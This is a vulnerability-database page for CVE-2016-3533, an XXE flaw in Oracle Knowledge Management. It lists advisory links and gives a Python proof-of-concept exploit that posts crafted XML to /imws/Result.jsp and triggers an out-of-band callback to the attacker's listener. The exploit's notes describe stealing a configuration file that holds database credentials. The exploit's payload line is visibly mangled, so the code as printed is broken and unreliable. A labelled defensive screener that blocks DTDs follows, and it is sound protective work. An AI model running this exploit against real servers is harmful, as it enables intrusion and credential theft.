| Title | Published | Views | Family |
|---|---|---|---|
| Unspecified Vulnerability in Oracle E-Business Suite Knowledge Management | 21 Jul 2016 00:00 | – | cnvd |
| CVE-2016-3533 | 21 Jul 2016 10:00 | – | cve |
| CVE-2016-3533 | 21 Jul 2016 10:00 | – | cvelist |
| EUVD-2016-4559 | 7 Oct 2025 00:30 | – | euvd |
| CVE-2016-3533 | 21 Jul 2016 10:13 | – | nvd |
| Oracle Critical Patch Update - July 2016 | 19 Jul 2016 00:00 | – | oracle |
| Oracle E-Business Multiple Vulnerabilities (July 2016 CPU) | 20 Jul 2016 00:00 | – | nessus |
| Open redirect | 21 Jul 2016 10:13 | – | prion |
| CVE-2016-3533 | 21 Jul 2016 10:00 | – | vulnrichment |

```python
#!/usr/local/bin/python
"""
Oracle Knowledge Management Castor Library XML External Entity Injection Information Disclosure Vulnerability
Found by: Steven Seeley of Source Incite
CVE: CVE-2016-3533
SRC: SRC-2016-0023
Notes:
- You can steal the C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml file via the XXE bug which contains the db user/pass
- This PoC simply performs an Out-of-Band request
Example:
========
saturn:oracle-knowledge mr_me$ ./poc.py
(+) usage: ./poc.py
(+) eg: ./poc.py 172.16.175.137 172.16.175.1 nwv25cerqtsxg42qhayn5trb
saturn:oracle-knowledge mr_me$ ./poc.py 172.16.175.137 172.16.175.1
(+) starting xxe server...
(+) launching xxe attack...
(!) triggered xxe attack!
"""
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
import threading
import sys
import time
import requests

# stfu
requests.packages.urllib3.disable_warnings()

class xxe(BaseHTTPRequestHandler):
    # stfu
    def log_message(self, format, *args):
        return

    def do_GET(self):
        # if we land here, the target is vuln
        print "(!) triggered xxe attack!"
        self.send_response(200)
        self.end_headers()
        message = threading.currentThread().getName()
        self.wfile.write(message)
        self.wfile.write('\n')
        return

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print "(+) usage: %s" % sys.argv[0]
        print "(+) eg: %s 172.16.175.137 172.16.175.1" % sys.argv[0]
        sys.exit(1)
    t = sys.argv[1]
    x = sys.argv[2]
    try:
        server = HTTPServer(('0.0.0.0', 9090), xxe)
        print '(+) starting xxe server...'
        # we just handle a single request in a thread so we can make the remote xxe attack
        http = threading.Thread(target=server.handle_request).start()
        print "(+) launching xxe attack..."
        # setup our oob xxe attack
        xml = ""
        xml += "%%xxe;]>" % x
        # data & headers
        h = {'content-type': 'application/x-www-form-urlencoded'}
        d = {'method' : '2', 'inputXml': xml }
        url = "http://%s:8226/imws/Result.jsp" % t
        # fire, and if we hit our webserver, the target is vuln ;-)
        requests.post(url, headers=h, data=d)
    except KeyboardInterrupt:
        print '(+) shutting down the web server'
        server.socket.close()
```
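
From the defender's side, the `inputXml` field that the PoC posts to `/imws/Result.jsp` can be screened so that no document carrying a DTD reaches the XML parser. This is an added example, not part of the original PoC or of Oracle's patch; `screen_request`, `parse_without_dtd` and the `<request>` sample schema are hypothetical, and it assumes the service never legitimately needs a DOCTYPE.

```python
from urllib.parse import parse_qs, urlencode
from xml.parsers import expat


class DtdForbidden(ValueError):
    """The document carries a DOCTYPE or an entity declaration."""


def parse_without_dtd(xml_text):
    """Parse with expat, refusing any DTD. Returns the root element name."""
    parser = expat.ParserCreate()
    root = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdForbidden("DOCTYPE %r (system id %r)" % (name, sysid))

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise DtdForbidden("entity declaration %r" % name)

    # Exceptions raised inside expat handlers propagate out of Parse().
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = lambda name, attrs: root.append(name)
    parser.Parse(xml_text, True)
    return root[0]


def screen_request(form_body):
    """Return (verdict, detail) for a urlencoded POST body sent to Result.jsp."""
    docs = parse_qs(form_body, keep_blank_values=True).get("inputXml", [])
    if not docs:
        return ("allow", "no inputXml field")
    for doc in docs:  # a repeated field must not smuggle a second document
        try:
            parse_without_dtd(doc)
        except DtdForbidden as exc:
            return ("block", str(exc))
        except expat.ExpatError as exc:
            return ("block", "malformed XML: %s" % exc)
    return ("allow", "inputXml parsed without a DTD")


# Constructed sample bodies; the <request> schema is hypothetical.
BENIGN = urlencode({"method": "2", "inputXml": "<request><q>reset password</q></request>"})
WITH_DTD = urlencode({"method": "2", "inputXml":
                      '<!DOCTYPE request [<!ENTITY note "internal">]><request>&note;</request>'})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("with DTD", WITH_DTD)):
        print(label, "->", screen_request(body))
```

Because the check runs a real parser rather than a pattern match, a DOCTYPE is caught wherever XML syntax allows it, and the request is blocked before any entity is resolved.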